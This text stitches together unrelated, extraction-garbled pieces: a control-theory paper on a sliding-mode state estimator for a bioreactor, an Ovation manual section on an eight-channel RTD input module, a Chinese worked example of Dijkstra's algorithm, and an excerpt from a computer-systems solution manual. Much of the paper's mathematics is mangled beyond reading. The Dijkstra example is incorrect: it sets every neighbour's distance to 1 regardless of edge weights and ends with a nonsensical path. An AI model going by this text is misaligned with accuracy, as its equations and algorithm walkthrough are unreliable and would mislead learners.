À1)01ÂnÃis a constant matrix,andC W [10ÁÁÁ0]is the output matrix,c (~x ,u )W a (~x)þg (~x )u ,a (~x )W [00ÁÁÁ0f (~x )]T,g ()W [g 1(~x)g 2(~x )ÁÁÁg n (~x )]T with f (~x )¼L nf h (x ))andg i (~x)¼L b L (i À1)f h (x (k )),for all i ¼1,...,n .After the state transformation,both A and C are constant matrices.An estimation gain L can be readily designed such that A –LC is a stable matrix.However,the additional non-linear terms make convergence analysis of the estimation problem more complicated.The results in [6–8]proved the estimation convergence of the following estimator_^~x¼A ^~x þc (^~x ,u )þL (y ÀC ^~x )(4)where ^~xis the estimate of ~x and L is a properly chosen esti-mation gain,under the following assumptions:Assumption 1:The mapping F (x )is a diffeomorphism 8x [M .Both the Jacobian matrix @F (x )=@x and the inverse Jacobian matrix [@F (x )=@x ]À1exist.Assumption 2:The transformed system (3)satisfiesg (~x)W g 1(~x 1)g 2(~x 1,~x 2)ÁÁÁg n (~x 1,~x 2,...,~x n )ÂÃT:Assumption 3:The functions of f (~x),g i (~x 1,~x 2,...,~x i );i ¼1,...,n ,are Lipschitz functions w.r.t.~x in the trans-formed space.Assumptions 2and 3can be conservative,but they characterise the system that is uniformly observable for any bounded input.It has been proven in [6]that Assumption 2is a sufficient condition but not a necessary condition to ensure the uniform observability for any input.The triangular structure in Assumption 2is also necessary for the equivalent control based SMO [15,17]to facilitate successive evaluation of higher order derivative terms from the measurable estimation error.The estimator (4)will yield the following estimation of the original states_^x ¼@F (x )@x !À1x ¼^x _^~x ¼f (^x)þb (^x )u þ@F (x )@x !À1x ¼^x L y Àh (^x )ðÞ(5)For systems with white noise,a Kalman-like nonlinearobserver is widely adopted [6,8],where L is designed to produce a good estimate in terms of mean square errors.However,for systems with modelling uncertainties not suf-ficiently random,the designed observers may give certain errors.3Robust nonlinear state estimatorIn this paper,we consider the following nonlinear uncertainsystem where modelling uncertainties and disturbance are represented as a scalar-valued disturbance or unknown input d (x ,t )distributed by a known vector p (x ,t ),and the nominal plant is in the form of (1)satisfying Assumptions 1,2and 3,that is,˙x(t )¼f (x )þb (x )u (t )þp (x ,t )d (x ,t )y (t )¼h (x )(6)The unknown input is assumed to be bounded for someupper bound d,that is,j d (x ,t )j d .Under Assumption 1,we transfer (6)using the mapping of ~x¼F (x )to the following _~x¼A ~x þc (~x ,u )þ~p (~x )d (x ,t )(7)where y ¼C ~xand ~p (~x )¼(@F (x )=@x )p (x ,t ).To design a robust nonlinear estimator,we need the following additional assumptions.Assumption 4:The known functions f (x ),b (x )and p (x ,t )are bounded with respect to their arguments on M .The input of the nonlinear system (6)is bounded such that u u max for some upper bound u max .Further,the system (6)is Bounded-Input-Bounded-States (BIBS)stable.Assumption 5:The distribution vector ~p(~x )is Lipschitz function w.r.t.~xand has the following form ~p (~x )¼1~p 2(~x )ÁÁÁ~p n (~x )ÂÃT(8)For system (7)satisfying Assumptions 1–5,a nonlinearestimator with a robust term can be designed as_^~x ¼A ^~x þc (^~x ,u )þL (y ÀC ^~x )þ~p (^~x )u r (t )(9)Here,L ¼l 1l 2ÁÁÁl n ÂÃT(10)is a properly chosen constant feedback estimation gain.The design of the scalar-valued robust term u r is based on sliding mode theory,and is given asu r (t )¼Àrsign(e 1)¼r sign(y Àh (^x))(11)where r is a finite constant slidingmode estimation gain tobe given in the ensuing Lemma 2.Remark 1:The structure in (8)can be obtained by normal-ising ~p(~x )with ~p 1(~x ).If Assumption 5does not hold,that is if ~p1(~x )¼0,then the unknown input is not observable,and the observer cannot overcome the unknown input /disturb-ance in the estimation.Also by this proposed method,we no longer require the so-called matching condition [11]to be satisfied in the design.In general,the matching condition [11]is applicable for a constant distribution matrix.For thecase of systems with state-dependent nonlinear entries ~p(~x ),the design of matrix to satisfy the matching condition is notfeasible.For the case of constant-matrix ~p,our design also satisfies the matching condition [11].3.1Boundedness of error dynamicsDefine the estimation residual or errore W [e 1e 2ÁÁÁe n ]T as e W ^~xÀ~x .It can be obtained from (7)and (9)that_e ¼Ae þc (^~x ,u )Àc (~x ,u )þL (C˜x ÀC ˆ˜x)þ~p(^~x )u r À~p (~x )d (x ,t )(12)¼(A ÀLC )e þc (^~x ,u )Àc (~x ,u )þ~p(^~x )u r À~p (~x )d (x ,t )(13)The boundedness of e is proved in the following Lemma 1based on Lyapunov function analysis.To proceed with the analysis,we need to design L such that the eigenvalues of A –LC are stable,then we can define Lyapunov function V 0W e T Pe ,where the positive symmetric matrix P ¼P T .0is such that(A ÀLC )T P þP (A ÀLC )¼ÀI(14)Lemma 1:For the system (6)satisfying Assumptions 1–5provided that (15)function.for j u r j ¼of @F (for _V0r Under Lyapunov equation (14)and the derived results in(16)and (17),we have_V 0 Àk e k 2þ2l max (P )l c k e k 2þ2l max (P )b ~p ( d þr )k e k ¼Àc 1k e k 2þc 2k e kwhere c 1W 1À2l max (P )l c ,c 2W 2l max (P )b ~p ( d þr ).Theestimation gain L shall be designed such that condition (15)is satisfied,so that c 1.0.Hence e is bounded such that k e k c 2=c 1.Since the transformation matrix@F (x )=@x and x are bounded,we have ^~x bounded.A 3.2Sliding mode gain designFrom the estimation error dynamics (13),we can notice thatif d (x ,t )¼0,then a normal estimator (9)where u r ¼0will make the right hand side of (13)the increments of Lipschitzian functions under Assumption 4,hence we can prove e !0by a proper L .However,with modelling uncertainties in the form of a scalar disturbance d (x ,t )not necessarily Lipschitzian,the normal estimator can only achieve a bounded e instead of e !0.Remark 2:When the error e 1is in the reaching phase (i.e.initially when e 1=0),it is desirable to have the remaining error dynamics (e 2,...,e n )free from the effect of switch-ing.In this paper,when the system is in the reaching phase,that is,trajectory e 1(t )(which is measurable)is inthe reaching phase,the distribution matrix ~p(^~x )in (9)can be replaced by~pÃ(^~x )¼[10ÁÁÁ0]T(18)So,the remaining states are unaffected by the slidingmode gain or switching term in the reaching phase and the boundedness of the other states will be independent of the unknown input.This in general is adopted by the equiv-alent control based SMO’s [15,17]to avoid peaking phenomenon [27]so that system states reach the sliding mode sequentially.In our design,the estimation accuracy is improved viathe sliding mode term ~p(~x )u r in (9).The rationale of this solution is two-fold:(A)With the sliding surfacee 1¼0(19)the aim is to design the sliding mode estimation as (11)toreach and maintain in the sliding mode.(B)Ensure that the term [u r Àd (x ,t )]of the estimation error dynamics (13)in the sliding mode e 1¼0,that is,the zero dynamics,can be substituted by an increment ofe 1from (12)as follows_e1¼e 2Àl 1e 1þ[g 1(^~x 1)Àg 1(~x 1)]u þu r Àd (x ,t )(21)For the Lyapunov function V 1¼1=ð2Þe 21,by using the above and the sliding mode estimation (11)we haveV 1¼e 1_e 1¼Àl 1e 21þe 1[g 1(^~x1)Àg 1(~x 1)]u þ[e 2(t )Àd (x ,t )]e 1Àr j e 1jAs the state space of interest M is compact,the state isbounded.Since error remains bounded,we have e 2,j e 2(k )j b e 2for some upper bound b e 2.Therefore there exists a finite constant gain satisfying (20)such that,if e 1=0,we haveV 1,Àl 1e 21þe 1[g 1(^~x1)Àg 1(~x 1)]u Under the Lipschitzian condition in Assumption 3and thebounded input condition in Assumption 4,we haveV 1,Àl 1e 21þl g 1u max e 21constant lg1and some maximum input u max .design of the feedback estimation gain l 1u max ensures that _V1,0if e 1=0.The using the gain (20)ensures that the sliding surface e 1¼0can be reached in a finite time and maintained thereafter.A When the error e 1is in the sliding mode,the robust term can be viewed as ‘tracking element’for the unknown input or disturbance input.So the robust term in the sliding mode can be viewed as a estimate of the disturbance d (x ,t )to improve the accuracy of estimation and so the convergence of estimation of error to zero is achieved.The following development will analyse the convergence of the estimation error in the sliding mode.3.3Convergence of error dynamics in the sliding modeSince the estimator design (9)using the robust term (11)ensures the sliding mode,we only need to examine the con-vergence of the dynamics of e during the sliding mode.In the sliding mode when e 1¼0and _e1¼0,^~x 1¼~x 1,the equivalent control of u r can be obtained from (21)as in [11]u eq ¼d (x ,t )Àe 2,d(22)where the subscript d denotes the estimated ^~x-related variables in the sliding mode,that is,e d ¼[e 1,d e 2,d ÁÁÁe n ,d ]T W ^~xd À~x .Substituting the above equivalent control (22)into (13),we have the estimation error dynamics in the sliding mode of e 1¼0˙ed ¼(A ÀLC )e d þc (^~x d ,u )Àc (~x ,u )þ(~p(^~x d )À~p (~x ))u eq þ~p (~x )[u eq Àd (x ,t )]¼(A ÀLC )e d þc (^~xd ,u )Àc (~x ,u )þ(~p(^~x d )À~p (~x ))u eq À~p (~x )e 2,d (23)The equivalent control in the sliding mode clearly cancels the disturbance effect in the state estimation.So the robust term can be viewed as a disturbance estimate.The recon-struction of the disturbance from the sliding mode is dis-cussed in the next section.Obviously,the equilibriumpoint of the error dynamics (23)is e d ¼0,i.e.^~xd ¼~x .The following theorem further examines the condition for asymptotic stability of the estimation error in M .Theorem 1:For the system (6)satisfying Assumptions 1–5,the estimator (9)with the robust term (11)and the gain (20)ensures that the estimation error is asymptotically stable in 2u eq u eq for some upper bound u eq .Similar to (17),~p (~x ) b Ã~p where b Ã~p is the bound of reduced-order ~pin the sliding mode.Under Assumptions 3,5,c (~x,u )and ~p(^~x )are Lipschitz functions,so we have (25)(26)using (23),_V 2¼e T d P ˙e d þ˙e T d Pe d¼e T d [(A ÀLC )TP þP (A ÀLC )]e dþ2e T d P [c (^~x d ,u )Àc (~x ,u )þ(~p (^~x d )À~p (~x ))u eq ]þ2e T d P [À~p(~x )e 2,d ]Under Lyapunov equation (14)and the derived results in (25)and (26),we have_V 2 Àk e d k 2þ2l max (P )[l Ãc þl Øp u eq þb Ã~p]k e d k 2Hence condition (24)guarantees convergence of therobust estimator.A 3.4Observer in the original spaceTo estimate the states in the original system (6),we transfer (9)back to the original spaceasmay approximate (.)by a saturation functionsat (Á,1)W Á=1if j Áj 1sign(Á)if j Áj .1&,where 1.0is the threshold.Remark 3:By replacing the (.)function with sat (.),the error dynamics finally settle to a bound inside the boundary layer rather than converging to zero in the sliding plane.As shown in this paper,the convergence of e occurs after e 1reaches thesliding mode.Decreasing theboundary layer thickness 1in sat (.)increases the accuracy in estimation.3.5Design of gain LThe gain L should be designed such that it satisfies the two conditions (15),(24)and the Lyapunov condition (14).If there is no disturbance in the system,the gain design of the system (9)will be similar to the result of Thau’s obser-[28].The stability aspects for observer of the similar are discussed in [29].Extensions of Thau’s work for Lipschitz nonlinear systems were given in the recent works [30,18].The distance to unobservability of the pair (A ,C )is defined as the magnitude of the smallest perturbation that makes the pair unobservable [31,Definition 2.1],[32].The methods of [30,31]provide some insights about the distance to unobservability and the selection of the con-dition number that gives better stability.The gain is to be designed such that the distance to unobservability [32]of the linear matrix A –LC is greater than the Lipschitz con-stants and bounded functions (right hand side of inequalities in (15)and (24)),in order to achieve stability for the system.From the gain design point of view,the design is similar to the design methodology of works [18,28,30,31]except that the development is for nonlinear systems with unknown input and involves the Lipschitz constants as well as bounds resulting from nonlinear SMO.It is clear that condition (24)is stronger than condition (15).If the unknown input distribution matrix ~p (~x )is a constant matrix or functions of the outputs,that is ~p(~x )¼~p (y ),we have l ~p ¼l ~p 1¼0.So,the condition (24),reduces to the forml max (P ) 12l Ãc þb Ã~p h i (28)The above condition together with (14)is similar to the result of Thau’s observer [28]except for an additional bound arising from the uncertainties.The presence of dis-turbances inherently introduces constraints into the system.In this setting,one may also use the procedures adopted by [18,31]for the gain design.4Unknown input estimation from sliding modeOnce the trajectory reaches the sliding mode and all the states converge to the true states,the equivalent control u eq information can be used to reconstruct the unknown input.That is,once the system attains the sliding mode,and states converge to the true states,we have ^~xd !~x .Thereforee 2,d ’0Then,from (22)we can approximateu eq ’d (x ,t )(30)We can recover the equivalent control signal by the use ofa low-pass filter [11].Continuous approximation of equival-ent injection signal by using a small positive scalar was implemented in [16].Alternatively,by using a small bound-ary layer thickness e ,we can eliminate chattering and also approximate the discontinuous component of the signal within the boundary layer.The use of the boundary layer is also equivalent to the approximation given by [16].Similar to the approximation of [16],for some small positive scalar d ,the unknown input can be estimated as^d (x ,t )’(r sign(e 1))eq’re 1(j e 1j þd )(31)Remark 4:The estimation of unknown input relies only on the output estimation error and hence the estimation can be performed online together with state estimation.5Application to bioreactorAs an application example,this paper investigates the on-line monitoring of bioreactors [6,33].The bioreactor system with uncertain parameters belongs to the generic form of the nonlinear uncertain system considered for the proposed robust estimator design.Consider the following continuous biological system –a bioreactor,which has been discussed in many works [6,34,35]_X¼m (X ,S )X ÀXD _S¼Àm (X ,S )X Yþ(S f ÀS )D (32)In the above equations,X represents the cell mass con-centration that can be measured ‘on-line’,S represents thesubstrate concentration that is not measured,S f is the sub-strate concentration in the feed stream,Y is the yield of cell mass,D .0is the dilution rate,and also the plant’s control input.S f and Y are known constants.The growth rate function m (X ,S )is described by the Contois modelm (X ,S )Wm m S c (33)where m m .0denotes the uncertain maximum growth,and k c .0denotes the uncertain saturation constant.We can now obtain the bioreactor model with the growth function (33)as_X¼m m XS k c X þSÀXD _S¼À1Y m m XS k c X þSþ(S f ÀS )D (34)The cell mass concentration X (t )is measured by a bio-sensor.The target is to estimate the unavailable S (t )from the measurable X (t ).In a practical situation,m m and k c may be uncertain and time-varying.Hence we them into m m ¼m 0m þd 1(t ),k c ¼k 0c þd 2(t ),where m 0mand k 0c are the known nominal parameters,and d 1(t )and d 2(t )model the bounded additive time-varying parametric uncertainties.The system satisfies (1)the dilution rate is bounded as D (t )!D min .0,8t ,where D min is a constant;(2)the feed rate S f is bounded;(3)each reaction involves at least one reactant which is neither a catalyst nor an auto-catalyst,hence according to Theorem 1.1in [34],we can conclude that the state variables X (t ).0,S (t ).0andre-written into the form of (6),wheref (x )¼m 0m XS k cX þS À1Y m 0m XS k 0c X þS 2666437775,b (x )¼ÀX S f ÀS"#p ¼1À1Y"#,d (x ,t )¼m m XS k c X þS Àm 0m XS k c X þS ,y ¼h (x )¼X ,@h (x )@x ¼10 !,L p h (x )¼1:The state transformation ~x¼F (x )¼h (x )L f h (x )ÂÃTproducesHence,we @F (x )@x ¼10m 0m S 2(m 0m X þS )m 0m k 0c X 2(m 0m X þS )2435@F (x ) !À1¼10ÀS 2k c X (m 0m X þS )2m k c X2435.It can be readily computed that the transformed system becomes_~X (t )_~S(t )"#¼0100 !~X (t )~S (t )"#þ0f (~X ,~S ) !þÀ~X (t )g (~X ,~S )"#D (t )þ1z (~X ,~S ) !d (x ,t )It can be verified thatf (~X,~S )and g (~X ,~S )are differen-tiable with respect to their arguments,these together withthe boundedness of the states X ,S ,~X,~S ensure the Lipschitzian f and g .Moreover,the above equation belongs to the structure given in (3).Hence both Assumptions 2and 3are satisfied.Owing to the bounded-ness of the states X ,S ,~X,~S ,it can also be verified that ~p(~x )is Lipschitz function with ~p 1¼L p h (x )¼1.Hence Assumption 5is also satisfied.5.2Robust estimatorWe need to choose a proper estimation gain L ¼l 1l 2ÂÃTand the sliding mode estimation gain r .Since L p h (x )¼1,(35)_^S ¼ÀY m k 0c X þS þ(S f À^S)D (36)The unknown input or disturbance can be estimated according to (31)as^d(x ,t )’r (^X ÀX )j XÀX j þd (37)5.3Simulation resultsThe following parameters of the bioreactor described by(34)were chosen for the simulation:m m 0¼1h21,k 0c ¼1,s f ¼1g /l,Y ¼1.The additive parametric uncertainties of m m and k c are sin(1.5p t )and 0.6cos(p t ),respectively.The initial cell mass concentration is X (t 0)¼0:02g /l,and the initial substrate concentration is S (t 0)¼0:03g /l.The initial value of the estimated cell mass concentration is ^X(t 0)¼0:01g /l,and the initial value of the estimated We use gain r ¼1and 1¼0:01.On the basis of the bounds of states and inputs,the Lipschitz constants and bounds for nonlinear functions are obtained as follows:l c ¼0:046,u max ¼0:5,b Ã~p¼0:143,l g 1¼1,l ~p ¼0:01and u eq r ¼1.The maximum eigenvalue of P ,the solution of (14)is 1.5.On the basis of these bounds,the inequalities in (15)and (24)are satisfied.First,we applied the nonlinear estimator without the robust terms in accordance with (5)_^X¼m 0m ^X ^S k 0c X þS À^X D þl 1(y À^X )_^S¼À1Y m 0m ^X ^S k 0c X þS þ(S f À^S )D þ(m 0m X þS )2l 2m 0m k 0c X 2ÀS 2l 1k 0cX 2 !(y À^X )Fig.1shows the estimation errors due to the imposedparametric uncertainties.Clearly,the estimator tracks the actual state but the accuracy is not very good.To improve the estimation accuracy,we applied the pro-posed robust nonlinear estimator described by (9)and (11),and implemented by (35)and (36)for this bioreactor appli-cation.Fig.2shows the improved estimation performance.To estimate the unknown input according to (37),d is chosen to be 0.001.The unknown input reconstructed from the sliding mode is shown in Fig.3.The estimated unknown input converges to the actual disturbance after all the states have converged.。

This publication adds the Eight Channel RTD module to the Ovation I/O Reference Manual. It should be placed between Sections 19 and 20.Date: 04/03IPU No.243Ovation ® Interim Publication UpdatePUBLICATION TITLEOvation I/O Reference ManualPublication No. R3-1150Revision 3, March 2003Section 19A. Eight Channel RTDModule19A-1. DescriptionThe Eight (8) channel RTD module is used to convert inputs from Resistance Temperature Detectors (RTDs) to digital data. The digitized data is transmitted to the Controller.19A-2. Module Groups19A-2.1. Electronics ModulesThere is one Electronics module group for the 8 channel RTD Module:n5X00119G01 converts inputs for all ranges and is compatible only with Personality module 5X00121G01 (not applicable for CE Mark certified systems).19A-2.2. Personality ModulesThere is one Personality module groups for the 8 channel RTD Module:n5X00121G01 converts inputs for all ranges and is compatible only with Electronics module 5x00119G01 (not applicable for CE Mark certified systems).19A-2.3. Module Block Diagram and Field Connection WiringDiagramThe Ovation 8 Channel RTD module consists of two modules an electronics module contains a logic printed circuit board (LIA) and a printed circuit board (FTD). The electronics module is used in conjunction with a personalty module, which contains a single printed circuit board (PTD). The block diagram for the 8 channel RTD moduleis shown in Figure 19A-1.Table 19A-1. 8 Channel RTD Module Subsystem ChannelsElectronic Module Personality Module85X00119G015X00121G01Figure 19A-1. 8 Channel RTD Module Block Diagram and Field Connection Wiring Diagram19A-3. SpecificationsElectronics Module (5X00119)Personality Module (5X00121)Table 19A-2. 8 Channel RTD Module SpecificationsDescription ValueNumber of channels8Sampling rate50 HZ mode: 16.67/sec. normally. In 3 wire mode, leadresistance measurement occurs once every 6.45 sec.during which the rate drops to 3/sec.60 HZ mode: 20/sec. normally. In 3 wire mode, leadresistance measurement occurs once every 6.45 sec.during which the rate drops to 2/sec.Self Calibration Mode: Occurs on demand only. The ratedrops to 1/sec. once during each self calibration cycle.RTD ranges Refer to Table 19A-3.Resolution12 bitsGuaranteed accuracy (@25°C)0.10% ±[0.045 (Rcold/Rspan)]% ± [((Rcold + Rspan)/4096 OHM)]% ± [0.5 OHM/Rspan]% ±10 m V ± 1/2LSBwhere:Rcold and Rspan are in Ohms.Temperature coefficient 10ppm/°CDielectric isolation:Channel to channel Channel to logic 200V AC/DC 1000 V AC/DCInput impedance100 M OHM50 K OHM in power downModule power 3.6 W typical; 4.2 W maximumOperating temperature range0 to 60°C (32°F to 140°F)Storage temperature range-40°C to 85°C (-40°F to 185°F)Humidity (non-condensing)0 to 95%Self Calibration On Demand by Ovation ControllerCommon Mode Rejection120 dB @ DC and nominal power line frequency+/- 1/2%Normal Mode Rejection100 dB @ DC and nominal power line frequency+/- 1/2%Table 19A-3. 8 Channel RTD RangesScale #(HEX)Wires Type Tempo FTempo CRcold(ohm)Rhot(ohm)Excitationcurrent(ma)Accuracy± ±countsAccuracy± ±% ofSPAN1310OhmPL0 to1200–18 t o6496106.3 1.090.222310OhmCU 0 to302–18 t o1508.516.5 1.0 130.32D350OhmCU 32 to2840 to1405080 1.0110.2711350OhmCU 32 to2300 to1105378 1.0120.30193100Ohm PL –4 to334–16 t o16892163.671.0110.27223100Ohm PL 32 to5200 to269100200 1.0100.25233100Ohm PL 32 to10400 to561100301 1.0100.25253120Ohm NI –12 t o464–11 t o240109360 1.0100.25263120Ohm NI 32 to1500 to70120170 1.0130.32283120Ohm NI 32 to2780 to122120225 1.0110.27804100Ohm PL 32 to5440 to290100 208 1.0100.25814100Ohm PL 356 t o446180 t o230168 186 1.0300.74824200Ohm PL 32 to6980 to370200 473 1.0120.30834200Ohm PL 514 t o648268 t o342402452 1.0290.71844100Ohm PL 32 to1240 to51100120 1.0190.47854100Ohm PL 32 to2170 to103100 140 1.0130.3286 4100Ohm PL 32 to4120 to211100 180 1.0110.27874100Ohm PL 32 to7140 to379100 240 1.0100.25884120Ohm PL 511 t o662266 t o350200230 1.0240.5919A-4. 8 Channel RTD Terminal Block Wiring Information19A-4.1. Systems Using Personality Module 5X00121G01 Each Personality module has a simplified wiring diagram label on its side, which appears above the terminal block. This diagram indicates how the wiring from the field is to beconnected to the terminal block in the base unit. The following table lists and defines the abbreviations used in this diagram.Table 19A-4. Abbreviations Used in the DiagramAbbreviation Definition+IN, -IN Positive and negative sense input connectionEarth ground terminal. Used for landing shields when the shield is to begrounded at the module.PS+, PS-Auxiliary power supply terminals.RTN Return for current source connection.SH Shield connector. used for landing shields when the shield is to begrounded at the RTD.SRC Current source connection.Note:PS+ and PS- are not used by this module.19A-5. 8 Channel RTD Module Address Locations19A-5.1. Configuration and Status RegisterWord address 13 (D in Hex) is used for both module configuration and module status. The Module Status Register has both status and diagnostic information. The bit information contained within these words is shown in Table 19A-5.Definitions for the Configuration/Module Status Register bits:Bit 0:This bit configures the module (write) or indicates the configuration state of the module (read). A “1” indicates that the module is configured. Note that until the module is configured, reading from addresses #0 through #11 (B in Hex) will produce an attention status.Bit 1:This bit (write “1”) forces the module into the error state, resulting in the error LED being lit. The read of bit “1” indicates that there is an internal module error,or the controller has forced the module into the error state. The state of this bit is always reflected by the module’s Internal Error LED. Whenever this bit is set,an attention status is returned to the controller when address #0 through #11(B in Hex) are read.Table 19A-5. 8 Channel RTD Configuration/Status Register (Address 13 0xD in Hex)Bit Data Description -Configuration Register (Write)Data Description -Status Register (Read)0Configure Module Module Configured(1 = configured; 0 = unconfigured)1Force errorInternal or forced error(1 = forced error; 0 = no forced error)250/60 Hz select (0 = 60Hz, 1 = 50Hz)50/60 Hz System (1 = 50Hz) d(read back)3SELF_CAL (Initiates Self Calibration)Warming bit (set during power up or configuration)40050060Module Not Calibrated 708CH.1 _ 3/4 Wire.CH.1 _ 3/4 Wire - Configuration (read back)9CH.2 _ 3/4 Wire.CH.2 _ 3/4 Wire - Configuration (read back)10CH.3 _ 3/4 Wire.CH.3 _ 3/4 Wire - Configuration (read back)11CH.4 _ 3/4 Wire.CH.4 _ 3/4 Wire - Configuration (read back)12CH.5 _ 3/4 Wire.CH.5 _ 3/4 Wire - Configuration (read back)13CH.6 _ 3/4 Wire.CH.6 _ 3/4 Wire - Configuration (read back)14CH.7 _ 3/4 Wire.CH.7 _ 3/4 Wire - Configuration (read back)15CH.8 _ 3/4 Wire.CH.8 _ 3/4 Wire - Configuration (read back)Bit 2:The status of this bit (read) indicates the conversion rate of the module, write to this bit configures the conversion rate of A/D converters as shown below.see Table 19A-6.Bit3:Write: This bit is used to initiate self-calibration. Read: This bit indicates that the module is in the “Warming” state. this state exists after power up and ter-minates after 8.16 seconds. the module will be in the error condition during the warm up period.Bit4 & 5:These bits are not used and read as “0” under normal operation.Bit 6:This bit (read) is the result of a checksum test of the EEPROM. A failure of this test can indicate a bad EEPROM, but it typically indicates that the module has not been calibrated. A “0” indicates that there is no error condition. If an error is present, the internal error LED is lit and attention status will be returned for all address offsets 0-11 (0x0 - 0xB). The “1” state of this bit indicates an unre-coverable error condition in the field.Bit 7:This bits is not used and read as “0” under normal operation.Bit 8 - 15:These bits are used to configure channels 1 - 8 respectively for 3 or 4 wire op-eration. A “0” indicates 3 wire and a “1” indicates 4 wire operation, see Table 19A-7 and Table 19A-8).Word address 12 (0xC) is used to configure the appropriate scales for Channels 1 - 4 (refer to Table 19A-7 and Table 19A-8).Table 19A-6. Conversion Rate Conversion Rate (1/sec.)Bit 260 (for 60Hz systems)050 (for 50Hz systems)1Table 19A-7. Data Format for the Channel Scale Configuration Register(0xC)Bit Data Description Configuration (Write)Data Description Status (Read)0 Configure Channel #1scale - Bit 0Channel #1 scale configuration (read back) - Bit 01Configure Channel #1scale - Bit 1Channel #1 scale configuration (read back) - Bit 12Configure Channel #1scale - Bit 2Channel #1 scale configuration (read back) - Bit 23Configure Channel #1scale - Bit 3Channel #1 scale configuration (read back) - Bit 34Configure Channel #2 scale - Bit 0Channel #2 scale configuration (read back) - Bit 05Configure Channel #2 scale - Bit 1Channel #2 scale configuration (read back) - Bit 16Configure Channel #2 scale - Bit 2Channel #2 scale configuration (read back) - Bit 27Configure Channel #2 scale - Bit 3Channel #2 scale configuration (read back) - Bit 38Configure Channel #3 scale - Bit 0Channel #3 scale configuration (read back) - Bit 09Configure Channel #3 scale - Bit 1Channel #3 scale configuration (read back) - Bit 1Caution:Configuring any or all channel scales while the system is running will cause all channels to return attention status for up to two seconds following the reconfiguration.Caution:Configuring any or all channel scales while the system is running will cause all channels to return attention status for up to two seconds following the reconfiguration.10Configure Channel #3 scale - Bit 2Channel #3 scale configuration (read back) - Bit 211Configure Channel #3 scale - Bit 3Channel #3 scale configuration (read back) - Bit 312Configure Channel #4 scale - Bit 0Channel #4 scale configuration (read back) - Bit 013Configure Channel #4 scale - Bit 1Channel #4 scale configuration (read back) - Bit 114Configure Channel #4 scale - Bit 2Channel #4 scale configuration (read back) - Bit 215Configure Channel #4 scale - Bit 3Channel #4 scale configuration (read back) - Bit 3Table 19A-8. Data Format for the Channel Scale Configuration Register(0xE)Bit Data Description Configuration (Write)Data Description Status (Read)0 Configure Channel #5 scale - Bit 0Channel #5 scale configuration (read back) - Bit 01Configure Channel #5 scale - Bit 1Channel #5 scale configuration (read back) - Bit 12Configure Channel #5 scale - Bit 2Channel #5 scale configuration (read back) - Bit 23Configure Channel #5 scale - Bit 3Channel #5 scale configuration (read back) - Bit 34Configure Channel #6 scale - Bit 0Channel #6 scale configuration (read back) - Bit 05Configure Channel #6 scale - Bit 1Channel #6 scale configuration (read back) - Bit 16Configure Channel #6 scale - Bit 2Channel #6 scale configuration (read back) - Bit 27Configure Channel #6 scale - Bit 3Channel #6 scale configuration (read back) - Bit 38Configure Channel #7 scale - Bit 0Channel #7 scale configuration (read back) - Bit 09Configure Channel #7 scale - Bit 1Channel #7 scale configuration (read back) - Bit 110Configure Channel #7 scale - Bit 2Channel #7 scale configuration (read back) - Bit 211Configure Channel #7 scale - Bit 3Channel #7 scale configuration (read back) - Bit 312Configure Channel #8 scale - Bit 0Channel #8 scale configuration (read back) - Bit 013Configure Channel #8 scale - Bit 1Channel #8 scale configuration (read back) - Bit 114Configure Channel #8 scale - Bit 2Channel #8 scale configuration (read back) - Bit 215Configure Channel #8 scale - Bit 3Channel #8 scale configuration (read back) - Bit 3Table 19A-7. Data Format for the Channel Scale Configuration Register(0xC)19A-6. Diagnostic LEDsTable 19A-9. 8 Channel RTD Diagnostic LEDsLED DescriptionP (Green)Power OK LED. Lit when the +5V power is OK.C (Green)Communications OK LED. Lit when the Controller is communicatingwith the module.I (Red)Internal Fault LED. Lit whenever there is any type of error with themodule except to a loss of power. Possible causes are:n - Module initialization is in progress.n - I/O Bus time-out has occurred.n - Register, static RAM, or FLASH checksum error.n - Module resetn - Module is uncalibrated.n - Forced error has been received from the Controllern - Communication between the Field and Logic boards failedCH1 - CH 8 (Red)Channel error. Lit whenever there is an error associated with a channel or channels. Possible causes are:n - Positive overrangen - Negative overrangen Communication with the channel has failed。

dijkstra标号法例题
Dijkstra标号法是一种用于求解带权图中单源点最短路径的算法。

以下是一个Dijkstra标号法的例题：
题目：已知一个带权图，求顶点A到其他所有顶点的最短路径。

图中的顶点及其权重如下：
顶点：A(0)，B(4)，C(3)，D(2)，E(1)
边权：AB(1)，AC(2)，AD(3)，AE(4)，BC(1)，BD(2)，BE(3)，CD(1)，DE(1)
以下是使用Dijkstra标号法求解的过程：
1. 初始化：将起点A的标号设为0，其他顶点的标号设为无限大。

2. 将起点A加入优先队列中。

3. 从优先队列中取出距离起点最近的点，这里是最小权值为0的A。

将A的邻接顶点B、C、D、E的标号更新为1（即距离A的最短路径长度为1）。

4. 修改从A出发到集合V-S（已找到最短路径的顶点）上任一顶点K 的最短路径长度。

如果d[K]大于d[A] + a[A,K]，则修改为d[K] = d[A] + a[A,K]。

在本例中，修改B、C、D、E到其他顶点的距离。

5. 重复步骤3和4，直到所有顶点都获得最短路径。

最终得到的最短路径如下：
A -> B(1) -> E(2) -> D(3) -> C(4)
需要注意的是，Dijkstra标号法得到的最短路径是单源点A到其他顶点的最短路径，而非A到B、A到C等两点之间的最短路径。

如需求解两点之间的最短路径，可以分别以两个顶点为起点，重复上述过程。

Computer Systems:A Programmer’s PerspectiveInstructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20031Copyright c2003,R.E.Bryant,D.R.O’Hallaron.All rights reserved.2Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)2{3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact 